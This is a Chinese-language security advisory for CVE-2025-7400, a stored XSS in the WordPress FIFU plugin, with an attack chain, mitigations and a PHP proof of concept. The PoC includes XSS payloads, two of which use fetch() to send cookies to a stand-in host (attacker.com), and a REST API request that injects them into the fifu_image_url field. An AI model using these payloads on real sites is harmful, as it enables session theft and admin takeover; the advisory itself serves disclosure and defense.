CVE-2025-7400 WordPress FIFU插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-7400

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Featured Image from URL (FIFU) 插件

漏洞概述

CVE-2025-7400 是 WordPress 平台上 Featured Image from URL（简称 FIFU）插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该插件允许用户通过 URL 设置文章的特色图片，广泛应用于各类 WordPress 网站中。漏洞存在于所有 5.2.7 及以下版本中，CVSS 评分为 6.4，属于中危级别。

该漏洞的根本原因在于插件对文章特色图片自定义字段（Featured Image custom fields）的输入缺乏充分的过滤与消毒（sanitization），同时在输出时也未进行适当的转义（escaping）处理。攻击者可以通过精心构造的恶意负载，将任意 JavaScript 代码注入到文章的自定义字段中。当其他用户（包括管理员）访问包含该恶意负载的页面时，注入的脚本将在受害者浏览器上下文中自动执行。

值得注意的是，Wordfence 曾在 5.2.2 版本中对该漏洞进行了部分修复，但并未完全解决问题，因此 5.2.2 至 5.2.7 版本仍然存在可被利用的风险。该漏洞需要认证用户（Contributor 级别及以上权限）才能触发，但一旦被低权限用户利用，可能导致管理员会话被劫持、网站内容被篡改、恶意重定向甚至后门植入等严重后果。

技术细节

该存储型 XSS 漏洞的技术原理如下：

1. **注入点**：FIFU 插件通过 WordPress 的自定义字段（post meta）机制存储特色图片的 URL 信息。攻击者在创建或编辑文章时，可以在这些自定义字段中输入恶意 JavaScript 代码，例如 `<script>alert(document.cookie)</script>` 或 `<img src=x onerror=...>` 等。

2. **缺失的过滤机制**：插件在保存用户输入的自定义字段值时，未调用 WordPress 标准的消毒函数（如 `sanitize_text_field()`、`wp_kses_post()` 等），导致恶意脚本被原样存入数据库。

3. **缺失的输出转义**：在前端页面渲染时，插件直接将自定义字段的值输出到 HTML 页面中，未使用 `esc_html()`、`esc_attr()`、`esc_url()` 等转义函数进行编码，使得浏览器将恶意代码解析为可执行的脚本。

4. **利用条件**：攻击者需要拥有 Contributor 级别及以上的 WordPress 账户权限（可以通过注册获得），然后创建包含恶意负载的文章。

5. **触发过程**：当其他用户（尤其是管理员）访问该文章页面时，恶意脚本将在其浏览器中执行，可窃取 Cookie、会话令牌，或以管理员身份执行任意操作（如创建新管理员账户、修改网站配置、上传 WebShell 等）。

6. **CVSS 向量分析**：AV:N（网络攻击）、AC:L（低复杂度）、PR:L（低权限要求）、UI:N（无需用户交互）、S:C（范围变更）、C:L/I:L/A:N（机密性和完整性影响低，无可用性影响），综合评分 6.4。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者在目标 WordPress 网站上注册一个 Contributor 级别的账户（如果网站开放用户注册），或通过其他方式获取低权限认证凭证。

STEP 2

步骤2：构造恶意负载

攻击者精心构造包含 JavaScript 代码的恶意字符串，例如窃取 Cookie、会话令牌或执行管理员操作的脚本。

STEP 3

步骤3：注入到特色图片自定义字段

攻击者创建新文章或编辑现有文章，将恶意负载注入到 FIFU 插件管理的特色图片自定义字段（如 fifu_image_url）中。由于插件未对输入进行过滤消毒，恶意代码被原样存入数据库。

STEP 4

步骤4：发布文章

攻击者将包含恶意负载的文章发布到网站上，等待受害者访问。

STEP 5

步骤5：受害者访问触发执行

当管理员或其他用户访问该文章页面时，FIFU 插件未对输出进行转义，恶意 JavaScript 在受害者浏览器上下文中执行。

STEP 6

步骤6：权限提升与持久化

恶意脚本窃取管理员会话 Cookie 或直接以管理员身份执行操作（如创建后门账户、修改网站配置、上传 WebShell），实现对网站的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-7400 - FIFU Plugin Stored XSS PoC
 *
 * This PoC demonstrates how an authenticated Contributor-level user
 * can inject malicious JavaScript via the Featured Image custom fields
 * of the FIFU plugin, which will execute when other users view the post.
 *
 * Usage:
 * 1. Log in to WordPress as a Contributor or higher.
 * 2. Create a new post via wp-admin/post-new.php or wp-admin/admin-ajax.php.
 * 3. Inject the malicious payload into the FIFU custom fields
 *    (e.g., fifu_image_url or related meta keys).
 */

// Malicious payload to inject into FIFU custom field (e.g., fifu_image_url)
$malicious_payload = '"><script>alert("XSS-CVE-2025-7400:"+document.cookie)</script>';

// Alternative payloads for different contexts:
$payload_img_onerror = '"><img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">';
$payload_svg = '"><svg onload="alert(document.domain)">';
$payload_event_handler = '"><a href="javascript:fetch(\'https://attacker.com/?cookie=\'+document.cookie)">Click me</a>';

// Example: Inject via WordPress REST API (requires authentication)
$wp_api_endpoint = 'https://target-wordpress-site.com/wp-json/wp/v2/posts';
$post_data = array(
    'title'   => 'Test Post',
    'content' => 'Post content here',
    'status'  => 'publish',
    'meta'    => array(
        'fifu_image_url' => $malicious_payload,  // Inject into FIFU meta field
    ),
);

/*
 * The above payload will be stored in the wp_postmeta table without sanitization.
 * When the post is rendered on the frontend, the plugin outputs the meta value
 * directly into the HTML without escaping, causing the script to execute
 * in the context of any visitor's browser session.
 *
 * Impact:
 * - Cookie theft / session hijacking
 * - Admin account takeover
 * - Malicious redirects
 * - Drive-by malware distribution
 */
echo "PoC payload ready: " . $malicious_payload . "\n";
?>

影响范围

Featured Image from URL (FIFU) < 5.2.2

Featured Image from URL (FIFU) 5.2.2 - 5.2.7（部分修复，仍存在风险）

防御指南

临时缓解措施

在官方发布完整修复版本之前，建议采取以下临时缓解措施：1）暂时禁用 FIFU 插件，改用 WordPress 原生特色图片功能；2）限制 Contributor 及以上级别用户发布文章的权限，仅允许可信编辑者操作；3）部署 Web 应用防火墙（WAF）规则，过滤自定义字段中的 `<script>`、`<img onerror>`、`<svg onload>` 等 XSS 特征字符串；4）启用 Wordfence 等安全插件的 XSS 防护规则；5）为所有管理员账户强制启用双因素认证，防止会话被劫持；6）定期检查 wp_postmeta 数据库表中是否包含可疑的自定义字段值，及时清理恶意负载。